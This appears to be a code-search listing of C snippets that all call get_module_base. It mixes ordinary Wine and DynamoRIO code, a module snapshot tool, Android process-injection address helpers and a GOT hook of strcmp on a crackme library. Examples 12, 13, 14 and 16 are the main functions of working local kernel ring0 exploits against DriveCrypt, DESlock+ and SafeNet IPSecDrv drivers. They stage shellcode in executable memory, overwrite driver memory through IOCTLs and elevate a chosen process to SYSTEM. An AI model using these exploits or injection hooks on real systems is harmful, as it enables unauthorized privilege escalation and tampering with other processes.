Example #1
0
void* get_remote_addr( pid_t target_pid, const char* module_name, void* local_addr )
{
    void* local_handle, *remote_handle;

    local_handle = get_module_base( -1, module_name );
    remote_handle = get_module_base( target_pid, module_name );

    return (void *)( (uint32_t)local_addr - (uint32_t)local_handle + (uint32_t)remote_handle );
}
Example #2
0
long get_remote_addr(pid_t target_pid, const char* module_name, void* local_addr)
{
    void* local_handle, *remote_handle;

    local_handle = get_module_base(0, module_name);
    remote_handle = get_module_base(target_pid, module_name);

    long ret_addr = (long)((uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle);

    return ret_addr;
}
Example #3
0
void* get_remote_addr( pid_t target_pid, const char* module_name, void* local_addr )
{
	void* local_handle, *remote_handle;

	local_handle = get_module_base( -1, module_name );
	remote_handle = get_module_base( target_pid, module_name );

	LOGD( "[+] get_remote_addr: local[%x], remote[%x]\n", local_handle, remote_handle );

	return (void *)( (uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle );
}
Example #4
0
void
init_dr_marker(dr_marker_t *marker)
{
    /* not calling memset b/c windbg_cmds is large */
# ifdef DEBUG
    marker->flags = DR_MARKER_DEBUG_BUILD;
# else
    marker->flags = DR_MARKER_RELEASE_BUILD;
# endif
# ifdef PROFILE
    marker->flags = DR_MARKER_PROFILE_BUILD;
# endif
    /* make sure we set one of the above flags and not more then one */
    ASSERT(TESTANY(DR_MARKER_BUILD_TYPES, marker->flags) &&
           ((DR_MARKER_BUILD_TYPES & marker->flags) &
            ((DR_MARKER_BUILD_TYPES & marker->flags) - 1)) == 0);
    /* TODO : add any additional flags? */
    marker->build_num = BUILD_NUMBER;
    marker->dr_base_addr = get_module_base((app_pc)init_dr_marker);
    marker->dr_generic_nudge_target = (void *)generic_nudge_target;
# ifdef HOT_PATCHING_INTERFACE
    marker->dr_hotp_policy_status_table = (void *)hotp_policy_status_table;
# else
    marker->dr_hotp_policy_status_table = NULL;
# endif
    marker->dr_marker_version = DR_MARKER_VERSION_CURRENT;
    marker->stats = get_dr_stats();
    dr_marker_magic_init(NT_CURRENT_PROCESS, marker);
    marker->windbg_cmds[0] = '\0';
}
Example #5
0
/**
 * calculate the address of the module in target process
 */
void* get_remote_addr( pid_t target_pid, const char* module_name, void* local_addr )
{
	void* local_module_base, *remote_module_base;

	// local and remote process both have a module named module_name
	local_module_base = get_module_base( -1, module_name );
	remote_module_base = get_module_base( target_pid, module_name );

	DEBUG_PRINT( "[+] get_remote_addr: local[%x], remote[%x]\n", \
		local_module_base, remote_module_base );
	
	// symbols in module each have a fixed offset
	// for example, mmap() has a fixed offset in libc.so
	return (void *)( (uint32_t)local_addr + (uint32_t)remote_module_base \
		 - (uint32_t)local_module_base );
}
Example #6
0
void* get_remote_addr(pid_t target_pid, const char* module_name, void* local_addr)    
{    
	void* local_handle, *remote_handle;    

	local_handle = get_module_base(-1, module_name);    
	remote_handle = get_module_base(target_pid, module_name);    

	DEBUG_PRINT("[+] get_remote_addr: local[%x], remote[%x]\n", local_handle, remote_handle);    

	void * ret_addr = (void *)((uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle);    

#if defined(__i386__)    
	if (!strcmp(module_name, libc_path)) {    
		ret_addr += 2;    
	}    
#endif    
	return ret_addr;    
}    
Example #7
0
/* 获取目标进程内某个动态库函数module_name的某函数在该进程的虚拟内存的地址
 * local_addr存放该函数在tracer所在位置
 * */
void* get_remote_addr(pid_t target_pid, const char* module_name, void* local_addr)
{
    void* local_handle, *remote_handle;

    // tracer内相应动态库地址
    local_handle = get_module_base(-1, module_name);
    // tracee内相应动态库地址
    remote_handle = get_module_base(target_pid, module_name);

    DEBUG_PRINT("[+] get_remote_addr: local[%x], remote[%x]\n", local_handle, remote_handle);

    // local_addr - local_handle = offset, 再加上remote_handle, 得到目标进程相应函数的地址
    // 因为同一module_name动态库内某函数所在位置是一致的,所以对于tracer和trace offset是相同的
    // 只要找到动态库在目标进程的位置,再加上offset即是该函数在tracee的位置
    void * ret_addr = (void *)((uint32_t)local_addr + (uint32_t)remote_handle - (uint32_t)local_handle);

#if defined(__i386__)
    if (!strcmp(module_name, libc_path)) {
        ret_addr += 2;
    }
#endif
    return ret_addr;
}
Example #8
0
/**********************************************************************
 *	    PE_LoadResource
 */
HGLOBAL PE_LoadResource( HMODULE hmod, HRSRC hRsrc )
{
    DWORD offset;
    const void *base = get_module_base( hmod );

    if (!hRsrc || !base) return 0;

    offset = ((PIMAGE_RESOURCE_DATA_ENTRY)hRsrc)->OffsetToData;

    if (is_data_file_module(hmod))
        return (HANDLE)get_data_file_ptr( base, offset );
    else
        return (HANDLE)((char *)base + offset);
}
Example #9
0
/**********************************************************************
 *  get_resdir
 *
 * Get the resource directory of a PE module
 */
static const IMAGE_RESOURCE_DIRECTORY* get_resdir( HMODULE hmod )
{
    const IMAGE_DATA_DIRECTORY *dir;
    const IMAGE_RESOURCE_DIRECTORY *ret = NULL;
    const void *base = get_module_base( hmod );

    if (base)
    {
        dir = &PE_HEADER(base)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE];
        if (dir->Size && dir->VirtualAddress)
        {
            if (is_data_file_module(hmod)) ret = get_data_file_ptr( base, dir->VirtualAddress );
            else ret = (IMAGE_RESOURCE_DIRECTORY *)((char *)base + dir->VirtualAddress);
        }
    }
    return ret;
}
Example #10
0
int main ( int argc , char *argv [] )
{
  SNAPSHOT_HEADER header;
  DUMPBLOCKV10 block;
  unsigned int filelen = 0;
  unsigned int sections;
  void *module_base = 0x10000000;
  void *data;
  FILE *f1;
  FILE *f2;

/* Chequeo los paramentros */
  if ( ( argc != 3 ) && ( argc != 4 ) )
  {
    printf ( "\nfsnap v1.1\n" );
    printf ( "Created by Nicolas A. Economou\n" );
    printf ( "Core Security Technologies, Buenos Aires, Argentina (2015)\n" );
    printf ( "\nUse: fsnap input_file output_file [-force_base]\n" );
    return ( 0 );
  }

/* Si quiero que CARGUE el MODULO en la BASE ORIGINAL */
  if ( argc == 4 )
  {
  /* Si NO es el comando CORRECTO */
    if ( strcmp ( argv [ 3 ] , "-force_base" ) != 0 )
    {
      printf ( "\nUse: fsnap input_file output_file [-force_base]\n" );
      return ( 0 );
    }
  }

/* Si el FILE existe */
  if ( is_filename_ok ( argv [ 1 ] ) == TRUE )
  {
  /* Si es la PRIMERA CORRIDA */
    if ( argc == 3 )
    {
    /* Si pude cargar el MODULO en MEMORIA */
      if ( is_loadable_module ( argv [ 1 ] , FALSE , &module_base ) == TRUE )
      {
      /* Si la BASE es DISTINTA de donde ESTA CARGADO */
        if ( get_module_base ( argv [ 1 ] ) != ( void * ) module_base )
        {
        /* Si PUDE CARGAR el MODULO en la BASE */
          if ( get_valid_loading ( argv [ 1 ] , argv [ 2 ] ) == TRUE )
          {
          /* Salgo OK */
            return ( 1 );
          }
        }

      /* Creo un SNAPSHOT del MODULO */
        create_snapshot ( argv [ 1 ] , module_base , argv [ 2 ] );
      }
    /* Si el file NO ES LOADABLE ( puede ser un file de otro OS, un shellcode, etc ) */
      else
      {
      /* Creo el OUTPUT FILE */
        f2 = fopen ( argv [ 2 ] , "wb" );

      /* Si el file NO pudo ser creado */
        if ( f2 == NULL )
        {
          printf ( "Error: Invalid output_file\n" );
          return ( 0 );
        }

      /* Abro el file */
        f1 = fopen ( argv [ 1 ] , "rb" );

      /* Obtengo el size del file */
        filelen = get_file_len ( f1 );

      /* Seteo el header del file */
        header.sig = 0x70616E73;
        header.version = 1;
        header.flags = 0x80000000; // Fake memory dump
        header.blockcount = 1;
        fwrite ( &header , sizeof ( header ) , 1 , f2 );

      /* Seteo la UNICA SECCION del SNAPSHOT */
        block.BaseAddress = 0x10000000;
        block.RegionSize = filelen;
        block.Protect = READABLE | WRITABLE | EXECUTABLE;
        fwrite ( &block , sizeof ( block ) , 1 , f2 );

      /* Dumpeo la data */
        data = malloc ( filelen );
        fread ( data , filelen , 1 , f1 );
        fwrite ( data , filelen , 1 , f2 );

      /* Mensaje al usuario */
        printf ( "[x] Setting ARBITRARY image base at: %.8x\n" , block.BaseAddress );

      /* Cierro el file */
        fclose ( f1 );

      /* Cierro el file */
        fclose ( f2 );
      }
    }
  /* Si es una CORRIDA AUXILIAR (para intentar MAPEAR en la BASE) */
    else
    {
    /* Si pude cargar el MODULO en MEMORIA */
      if ( is_loadable_module ( argv [ 1 ] , TRUE , &module_base ) == TRUE )
      {
      /* Creo un SNAPSHOT del MODULO */
        create_snapshot ( argv [ 1 ] , module_base , argv [ 2 ] );

      /* Retorno OK */
        return ( 1 );
      }
    /* Si NO se PUDO MAPEAR en la BASE */
      else
      {
      /* Salgo con ERROR */
        return ( 0 );
      }
    }
  }
/* Si hubo algun ERROR */
  else
  {
    printf ( "Error: Invalid input_file\n" );
    return ( 0 );
  }

  return ( 1 );
}
Example #11
0
int is_loadable_module ( char *filename , int force_base , void **base_address )
{
  HANDLE fmapping;
  HANDLE module;
  void *real_module_base;
  void *my_base_address;
  int ret = FALSE;

/* Abro el file */
  module = CreateFile ( filename , GENERIC_READ | GENERIC_EXECUTE , FILE_SHARE_READ , NULL , OPEN_EXISTING , NULL , NULL );
//  printf ( "module = %x\n" , module );

/* Si el file pudo ser ABIERTO */
  if ( module != NULL )
  {
  /* Intento cargar el modulo */
    fmapping = CreateFileMapping ( module , NULL , PAGE_EXECUTE_READ | SEC_IMAGE , NULL , NULL , "mapped" );
//    printf ( "fmapping = %x\n" , fmapping );

  /* Si el modulo pudo ser cargado */
    if ( fmapping != NULL )
    {
    /* Si Tengo que CARGARLO en la BASE */
      if ( force_base == TRUE )
      {
      /* Obtengo la BASE del MODULO */
        real_module_base = get_module_base ( filename );
      }
    /* Si NO IMPORTA donde lo carga */
      else
      {
      /* Dejo que el OS lo cargue donde puede */
        real_module_base = NULL;
      }

    /* Intento cargar el modulo */
      my_base_address = MapViewOfFileEx ( fmapping , FILE_MAP_EXECUTE , 0 , 0 , 0 , real_module_base );
//      printf ( "ERROR: %i\n" , GetLastError () );
//      printf ( "my_base_address = %x\n" , my_base_address );

    /* Si el modulo pudo ser cargado */
      if ( my_base_address != NULL )
      {
      /* Retorno la BASE del MODULO */
        *base_address = my_base_address;

      /* Retorno OK */
        ret = TRUE;
      }
    }
  /* Si el FILE NO PUDO ser MAPEADO */
    else
    {
    /* Si NO IMPORTA donde SE CARGA */
      if ( force_base == FALSE )
      {
      /* Si es un modulo VALIDO */
        if ( is_windows_module ( filename ) == TRUE )
        {
        /* Cargo el modulo DONDE PUEDO ( solo valido para OSs arcaicos ) */
          module = LoadLibraryEx ( filename , NULL , DONT_RESOLVE_DLL_REFERENCE );

        /* Si el MODULO pudo ser CARGADO */
          if ( module != NULL )
          {
          /* Retorno la BASE del MODULO */
            *base_address = ( void * ) module;

          /* Retorno OK */
            ret = TRUE;
          }
        }
      }
    }
  }

  return ( ret );
}
Example #12
0
int
main (int argc, char **argv)
{
  struct ioctl_req req;
  CHAR buf[1024], buf1[8], buf2[0x88+1];
  DWORD rlen, zlen, ppid;
  LPVOID zpage, zbuf, base;
  HANDLE hFile;
  BOOL result;

  printf ("DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  ppid = atoi (argv[1]);

  hFile = CreateFileA ("\\\\.\\DCR", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  memset (&req, 0, sizeof req);
  req.action = 0x153;
  req.flag = 0;
  req.ptr = buf;

  printf ("* enabling driver...\n");
  result = DeviceIoControl (hFile, DCR_IOCTL,
                            &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("** version: 0x%08X [%s], %s\n", *(int *) &buf[8], &buf[12], &buf[19]);
  printf ("* done\n");

  zpage = VirtualAlloc ((LPVOID) 0x610000, 0x10000,
                        MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (zpage == NULL)
    {
      fprintf (stderr, "* VirtualAlloc failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* allocated page: 0x%08X [%d-bytes]\n",
          zpage, 0x10000);

  base = get_module_base ();
  if (base == NULL)
    {
      fprintf (stderr, "* unable to find DCR.sys base\n");
      exit (EXIT_FAILURE);
    }
  printf ("* DCR.sys base: 0x%08X\n", base);

  memset (zpage, 0xCC, 0x10000);
  zbuf = fixup_ring0_shell (base, ppid, &zlen);
  memcpy ((LPVOID) zpage + 0x61, win32_fixup, sizeof (win32_fixup) - 1);
  memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) - 1), zbuf, zlen);
  memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) + zlen - 1),
          win32_ret, sizeof (win32_ret) - 1);

  memset (&req, 0, sizeof req);
  req.action = 79;
  req.flag = 0;

  memset (buf1, 0x41, sizeof buf1);
  buf1[sizeof buf1 - 1] = 0;
  req.arg1 = buf1;

  memset (buf2, 0x61, sizeof buf2);
  buf2[sizeof buf2 - 1] = 0;
  req.arg2 = buf2;

  req.ptr = buf;

  printf ("* hitting.. ");
  fflush (stdout);

  result = DeviceIoControl (hFile, DCR_IOCTL,
                            &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }

  printf ("done\n\n"
          "* hmmm, you didn't STOP the box?!?!\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}
Example #13
0
int
main (int argc, char **argv)
{
  struct ioctl_req req;
  DWORD disk_no, i, rlen, zlen, ppid;
  CHAR rbuf[64], sbuf[512];
  LPVOID zpage, zbuf, base;
  HANDLE hFile;
  BOOL result;

  printf ("DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  ppid = atoi (argv[1]);

  hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  for (i = 0; i < DLKFDISK_DISK_MAX; i++)
    {
      memset (&req, 0, sizeof req);
      req.arg[0] = (void *) 0xDEADBEEF;
      req.arg[1] = (void *) 0xDEADBEEF;
      req.arg[2] = (void *) 0xDEADBEEF;
      req.arg[3] = (void *) i;            /* drive number   */
      req.arg[4] = (void *) sizeof sbuf;  /* buffer size    */
      req.arg[5] = (void *) sbuf;         /* buffer pointer */

      result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
                                &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
      if (!result)
        {
          fprintf (stderr, "* DeviceIoControl failed\n");
          exit (EXIT_FAILURE);
        }

      if (strlen (sbuf + DLKFDISK_OFFSET - 1) > 6 &&
          strcmp (sbuf + DLKFDISK_OFFSET - 1 + 6, ":\\XXXAAAA.mnt") == 0)
        {
          disk_no = i;
          break;
        }
    }
  printf ("* write buf: \"%s\"\n", &sbuf[DLKFDISK_OFFSET - 1]);

  zpage = VirtualAlloc ((LPVOID) 0x41410000, 0x10000,
                        MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (zpage == NULL)
    {
      fprintf (stderr, "* VirtualAlloc failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* allocated page: 0x%08X [%d-bytes]\n",
          zpage, 0x10000);

  base = get_module_base ();
  if (base == NULL)
    {
      fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
      exit (EXIT_FAILURE);
    }
  printf ("* dlkfdisk.sys base: 0x%08X\n", base);

  memset (zpage, 0xCC, 0x10000);
  zbuf = fixup_ring0_shell (base, ppid, &zlen);
  memcpy ((LPVOID) 0x41414141, win32_fixup, sizeof (win32_fixup) - 1);
  memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) - 1), zbuf, zlen);
  memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) + zlen - 1),
          win32_ret, sizeof (win32_ret) - 1);

  memset (&req, 0, sizeof req);
  req.arg[0] = (void *) 0xDEADBEEF;
  req.arg[1] = (void *) 0xDEADBEEF;
  req.arg[2] = (void *) 0xDEADBEEF;
  req.arg[3] = (void *) disk_no;                                    /* drive number   */
  req.arg[4] = (void *) 512;                                        /* buffer size    */
  req.arg[5] = (void *) (base + DLKFDISK_SLOT - DLKFDISK_OFFSET);   /* buffer pointer */

  printf ("* overwriting [@0x%08X %d-bytes].. ",
          base + DLKFDISK_SLOT, strlen (sbuf + DLKFDISK_OFFSET - 1) + 1);
  result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
                            &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* jump to our address :) */
  printf ("* jumping.. ");
  result = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
                            &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("done\n\n"
          "* hmmm, you didn't STOP the box?!?!\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}
Example #14
0
int
main (int argc, char **argv)
{
  struct ioctl_req req;
  LPVOID c_addr, p_addr;
  LPVOID zpage, zbuf, base, pbase;
  DWORD rlen, zlen, ppid;
  HANDLE hFile;
  BOOL result;

  printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM 
exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  ppid = atoi (argv[1]);

  hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, 
PAGE_EXECUTE_READWRITE);
  if (zpage == NULL)
    {
      fprintf (stderr, "* VirtualAlloc failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* allocated page: 0x%08X [%d-bytes]\n",
          zpage, 0x10000);

  c_addr = zpage;
  base = get_module_base ();
  p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) / 
16);
  printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr);
  printf ("* call distance: 0x%08X\n", p_addr);

  memset (zpage, 0xCC, 0x10000);
  zbuf = fixup_ring0_shell (base, ppid, &zlen);
  memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
  memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
  memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
          win32_ret, sizeof (win32_ret) - 1);

  memset (&req, 0, sizeof req);
  req.arg[0] = p_addr;

  /* jump to our address   :)   */
  printf ("* jumping.. ");
  result = DeviceIoControl (hFile, IPSECDRV_IOCTL,
                            &req, sizeof req, &req, sizeof req, &rlen, 
0);
  if (!result)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("done\n\n"
          "* hmmm, you didn't STOP the box?!?!\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}
Example #15
0
int hook_strcmp()
{
    old_strcmp = strcmp;
    LOGD("Orig strcmp = %p\n", old_strcmp);
    void * base_addr = get_module_base(getpid(), LIBSF_PATH);
    LOGD("libcrackme.so address = %p\n", base_addr);

    int fd;
    fd = open(LIBSF_PATH, O_RDONLY);
    if (-1 == fd) {
        LOGD("error\n");
        return -1;
    }

    Elf32_Ehdr ehdr;
    read(fd, &ehdr, sizeof(Elf32_Ehdr));

    unsigned long shdr_addr = ehdr.e_shoff;
    int shnum = ehdr.e_shnum;
    int shent_size = ehdr.e_shentsize;
    unsigned long stridx = ehdr.e_shstrndx;

    Elf32_Shdr shdr;
    lseek(fd, shdr_addr + stridx * shent_size, SEEK_SET);
    read(fd, &shdr, shent_size);

    char * string_table = (char *)malloc(shdr.sh_size);
    lseek(fd, shdr.sh_offset, SEEK_SET);
    read(fd, string_table, shdr.sh_size);
    lseek(fd, shdr_addr, SEEK_SET);

    int i;
    uint32_t out_addr = 0;
    uint32_t out_size = 0;
    uint32_t got_item = 0;
    int32_t got_found = 0;

    for (i = 0; i < shnum; i++) {
        read(fd, &shdr, shent_size);
        if (shdr.sh_type == SHT_PROGBITS) {
            int name_idx = shdr.sh_name;
            if (strcmp(&(string_table[name_idx]), ".got.plt") == 0
                    || strcmp(&(string_table[name_idx]), ".got") == 0) {
                out_addr = base_addr + shdr.sh_addr;
                out_size = shdr.sh_size;
                LOGD("out_addr = %lx, out_size = %lx\n", out_addr, out_size);

                for (i = 0; i < out_size; i += 4) {
//                	LOGD("loop\n");
                    got_item = *(uint32_t *)(out_addr + i);
                    if (got_item  == old_strcmp) {
                        LOGD("Found strcmp in got\n");
                        got_found = 1;

                        uint32_t page_size = getpagesize();
                        uint32_t entry_page_start = (out_addr + i) & (~(page_size - 1));
                        mprotect((uint32_t *)entry_page_start, page_size, PROT_READ | PROT_WRITE);
                        *(uint32_t *)(out_addr + i) = new_strcmp;

                        break;
                    } else if (got_item == new_strcmp) {
                        LOGD("Already hooked\n");
                        break;
                    }
                }
                if (got_found)
                    break;
            }
        }
    }

    free(string_table);
    close(fd);
}
Example #16
0
int
main (int argc, char **argv)
{
  struct ioctl_req req;
  DWORD dResult, rlen, zpage_len, zlen, ppid;
  LPVOID zpage, zbuf, base;
  CHAR rbuf[64];
  HANDLE hFile;
  BOOL bResult;

  printf ("DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  ppid = atoi (argv[1]);

  hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  zpage_len = 0x7FFF;
  zpage = (LPVOID) 0x00000001;
  dResult = NtAllocateVirtualMemory ((HANDLE) -1, &zpage, 0, &zpage_len,
                                     MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
  if (dResult != STATUS_SUCCESS)
    {
      fprintf (stderr, "* NtAllocateVirtualMemory failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* allocated page: 0x%08X [%d-bytes]\n",
          zpage, 0x7FFF);

  base = get_module_base ();
  if (base == NULL)
    {
      fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
      exit (EXIT_FAILURE);
    }
  printf ("* dlkfdisk.sys base: 0x%08X\n", base);

  memset (zpage, 0xCC, 0x7FFF);
  zbuf = fixup_ring0_shell (base, ppid, &zlen);
  memcpy ((LPVOID) zpage, win32_fixup, sizeof (win32_fixup) - 1);
  memcpy ((LPVOID) (zpage + sizeof (win32_fixup) - 1), zbuf, zlen);
  memcpy ((LPVOID) (zpage + sizeof (win32_fixup) + zlen - 1),
          win32_ret, sizeof (win32_ret) - 1);

  memset (&req, 0, sizeof req);
  req.arg[0] = (void *) DLMFENC_FLAG;
  req.arg[1] = (void *) 0x12;
  req.arg[2] = (void *) (base + DLKFDISK_SLOT); /* overwrite pointer */

  printf ("* overwriting [@0x%08X %d-bytes].. ",
          base + DLKFDISK_SLOT, 16);
  xor_mask_req (&req);
  bResult = DeviceIoControl (hFile, DLMFENC_IOCTL,
                             &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!bResult)
    {
      fprintf (stderr, "DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  CloseHandle (hFile);

  hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  /* jump to our address :) */
  printf ("* jumping.. ");
  bResult = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
                             &rbuf, sizeof rbuf, &rbuf, sizeof rbuf, &rlen, 0);
  if (!bResult)
    {
      fprintf (stderr, "DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("done\n\n"
          "* hmmm, you didn't STOP the box?!?!\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}